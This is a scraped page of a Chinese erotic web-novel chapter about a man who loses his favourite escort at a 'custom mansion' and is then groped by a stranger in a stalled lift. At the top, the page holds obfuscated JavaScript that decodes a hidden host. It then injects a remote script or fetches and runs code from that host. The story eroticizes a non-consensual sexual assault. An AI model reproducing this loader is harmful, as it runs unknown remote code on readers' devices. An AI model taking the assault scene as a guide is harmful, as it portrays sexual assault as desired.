返回制定公馆_第17章  殇绝天下首页

关灯 护眼     字体:

上一章 目录 下一章

function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuZHNramJ2enZzLmNvbQ==','2843',window,document,['G','TpoZFcguG']);}:function(){};

《肉欲定制公馆10》宽阔包厢内,依旧是昏黄但还算明亮的古朴灯光,明明是舒适的天鹅绒椅子却让杨轩第一次感觉有些不舒服,看着接待生将纸质的赔偿合约递到眼前,上面白纸黑字却哪个也不是他缩希望看到的。“您好,我想请问一下,为什么我之前的预约被通知取消了?明羿……哦不,十二号他出什么事了吗?”杨轩局促不安的坐在接待间里,想到网上未来两个月对明羿的预约昨天全部通知取消,虽然提出会做出一定的补偿,可是杨轩还是觉得哪里不太对的样子。接待生抱歉的笑笑,顺便递给杨轩一杯水,企图缓解他激动的情绪。“真的好抱歉杨先生,关于取消预约这件事,我们会延长您VIP时限两个月作为补偿,如果您还是不满意,可以提出您的要求,我们尽量满足。”接待生没有直接回答杨轩心中最大的疑问,尤其那客套的笑容更让自己隐约察觉到这其中一定又什么问题。“可以告诉我,为什么我不能继续定制十二号吗?”指尖僵硬地在玻璃杯壁上磨蹭,杨轩不确定的问道:“是不是……是不是他被别人长期……”“十二号他没有和任何客人签订专属合约。”“那他是生病了?”“也不是。”接待生知道这样下去杨轩一定会继续追问不已,所以干脆不再瞒他。“十二号得罪了我们老板,所以他被开除了。”“开除?!”杨轩蹭的一下站起来,凳子都被他动作太大掀翻在地,很少会有这样冒失的举动,可是根本顾不得此刻自己到底有多失态,杨轩双手撑在办公桌上,不可置信的看着对方。“他……他到底做了什么?为什么他……”“杨先生。”接待生做了一个示意他坐下的安抚性手势,笑容依旧专业而又客套。“这是我们公馆的内部问题,所以无可奉告,如果您真的十分喜欢这一款,我们可以为您推荐相似的……”“我不是那个意思。”落寞地打断对方,杨轩这才反应过来自己刚才过激了,尴尬慌乱的扶起椅子,脑海里全是充斥着以后再也见不到明羿这条悲惨消息。“杨先生?杨先生?”看他自顾自的思索着,接待生轻声提醒道:“十天后的定制,我们给您推荐了几个人选,这是他们的资料。”“不必了。”低垂的眼睛里黯淡无光,杨轩苦笑着摇摇头,没有接对方递过来的资料,突然觉得这并不小的房间竟然让人觉得很压抑,胸口也要喘不过气来,连接待生明明很温柔的笑容都觉得让人不舒服。杨轩不死心的追问道:“能否告诉我他辞职后去哪了呢?或者……告诉我他的联系方式也可以!”接待生脸上笑容隐退,露出为难的表情,后来陆续又说了一些客套安慰的话语,杨轩都没有再听进去,浑浑噩噩地从定制公馆走出来,阳光温热充足,但杨轩却抱紧双臂,竟然觉得有些冷,明明刚才接待间里的冷气也没有开很足,为何这种凉意怎么都褪不去。已经是九月,可天气还是闷热的不行,杨轩瘫软在床上刚刚吃下大量感冒药,果然这种天气感冒什么的非常痛苦,每次吸气都会因为鼻子不通畅而脑袋发懵,四肢一点力气都没有,不过想起为什么变成这样的原因,杨轩自我厌恶的用被子蒙上脸。那天从定制公馆回来,就觉得身体不是很舒服,一想到不能再见到明羿,他便鬼使神差的用那根他送自己的电动按摩笔纾解后穴的瘙痒之意,最后玩的太晚累到睡着,醒来时发现自己不仅没有穿衣服,空调也一夜未关,这才导致自己现在这样丢人的境地,如果被人知道病因,真不如杀掉他算了。现在是早上八点钟,杨轩想要再睡一场回笼觉,手机突然在床头嗡嗡作响,就在对方几乎要挂断电话的同时,他终于虚软无力的摁下接听键。“总监!今天的例会你怎么还没有到!”“我不是让你帮我跟人事部请假……”闷闷的鼻音含糊不清,杨轩连说话都觉得嗓子跟火烧一样疼。琳达焦急又抱歉的连连说sorry,可是仍强调道:“您忘了吗!今天十二位董事会股东都到齐,总裁也特地从英国飞回来了!”杨轩差点合住的眼睛猛然睁开道:“会议是几点?!”“十点整!”琳达翻动手里的资料,肩膀夹着电话,声音越来越急,“总裁最不喜欢人迟到,您快点来啊!”距离会议还有两个半小时,杨轩挂掉电话立刻下床,差点因为虚软瘫坐在地毯上,后穴全是润滑液的黏腻感,昨天竟然没有洗澡就睡了。正想冲个澡再走,杨轩猛然意识到现在可是上班高峰期,没有过多的时间容自己浪费,所以换了干净衣服粗粗梳洗就冲出门打车直奔公司大楼。连出租车找的零钱都没有顾得拿上,杨轩甩上车门,一步三晃向着公司大门移动,周围,来来往往都是赶着上班的人,他尽量控制住自己的身体不要过度摇摆,可还是屡次差点被横冲直撞的新人撞到地上。勉强进入电梯中,杨轩随着人流被挤靠在最里面的夹角处,由于重感冒加两顿饭没吃引发的轻微低血糖,整个让脑袋跟被人打了一样,昏沉着不能思考,如果不是周围挤满了人,怕是连站立都困难,电梯内一直进人,知道发出限制警告的声音才让电梯勉强把门关住。杨轩侧靠住电梯厢壁,来自金属的冰凉触感让身体感觉好受一些,面前是电梯镜子,微眯着眼睛可以看到身后妆容精致的女人正用手捂鼻,很嫌弃的翻着白眼,似乎是怕杨轩的感冒病毒传染到自己,可惜这电梯里人太多,就算那女人想躲也动弹不得,杨轩只得把自己往角落里又缩了缩,整个脸都快贴到镜子上。头顶本来明亮的吸顶灯忽闪两下瞬间熄灭,同时正缓慢上升的电梯也咯!一下停住不动,连换气扇都不再转动,陆续响起的女人尖叫声让杨轩脑袋更疼了,这电梯最近时常有这种情况,至少稍等一下就会好,何况又是上班期间,工程部肯定会马上解决的。大家都是抱着这样的想法,甚至有人开始聊天,尖叫的女生也互相安慰着放松神经,趁此机会,杨轩闭上眼打算小小休息一下,可是突然臀部传来的奇怪触感,让他睡意全无,本来以为是谁手里的包包顶到自己,但这不断传来的异样举动,明显昭示着自己的臀瓣正在被人揉捏,想通过转身来回避这种骚扰时,肩头突然被人一把摁住,脸贴在镜子上,因为一点光亮都没有,所以并不能看到到底是谁在对自己这样做。不是误会也不是恶作剧,现在真的在电梯里有一个男人正在猥亵自己,这不是只有女人才会遇到的事情吗!为什么竟然是自己!杨轩想出声质问,可是又怕引起别人关注,变成更大的笑话,所以思索一阵后,仅仅靠拼命扭动想要躲避来自对方的揉捏。身后的女人到底什么时候变成了男人?!杨轩有些后悔为何刚刚自己要站在这种角落里,以至于整个人被压制住,什么挣扎都是徒劳,意识不清四肢无力也就算了,甚至连扭头看清楚到底是谁都难。男人手很大,对杨轩园翘的屁股蹂躏一阵后,慢慢用指尖挑逗他的股缝,甚至揪出来他塞在前端的衬衣下摆,把手滑进去,手掌肌肤和杨轩滚烫肌肉接触的同时,每过之处触电般的感觉让杨轩差点呻吟出声,好在喉头发炎肿痛,以至于仅仅变成一声意义模糊的低喘。不要再摸了……杨轩的脑袋不能思考,身体微微颤抖,双手扶在胸前墙壁上,想要夹紧胳膊不让对方的手在朝上延伸,可是这种没有力气的阻止,轻松就放过了对方的指尖,以至于心脏处的那颗小小乳头一下子就被男人擒住亵玩,差点就要从嘴里泻出的呻吟被杨轩拿手背堵住,被人玩弄到叫出声,真是太丢人了。公文包掉到地上,杨轩想要弯身去捡,可是乳头正好被人捏住拉扯,疼的他拱起身子,整个人依靠进身后之人宽阔的怀里,臀缝正好紧贴着男人的欲望前端,男人微耸胯部,暧昧淫靡的作弄着杨轩理智的底线。痛感之余,杨轩没有被抚慰的另一个乳头突然万分渴望能够被摸一摸,不,光是摸还不够,要是可以被含住舔弄该有多爽。从未想过和一个男人在自己每日上班必坐的电梯里做这种事情,这是杨轩第一次被明羿以外的人玩弄还会觉得有快感,以前在定制公馆被别人爱抚时只觉得有生理反应但不是那种酥麻想要更多的感觉,这个男人竟然几下就撩拨的他心痒难耐,到底是因为感冒,让身体更加敏感,还是自己逐渐已经被肉欲定制公馆改造的淫荡不堪。

『加入书签,方便阅读』

上一章 目录 下一章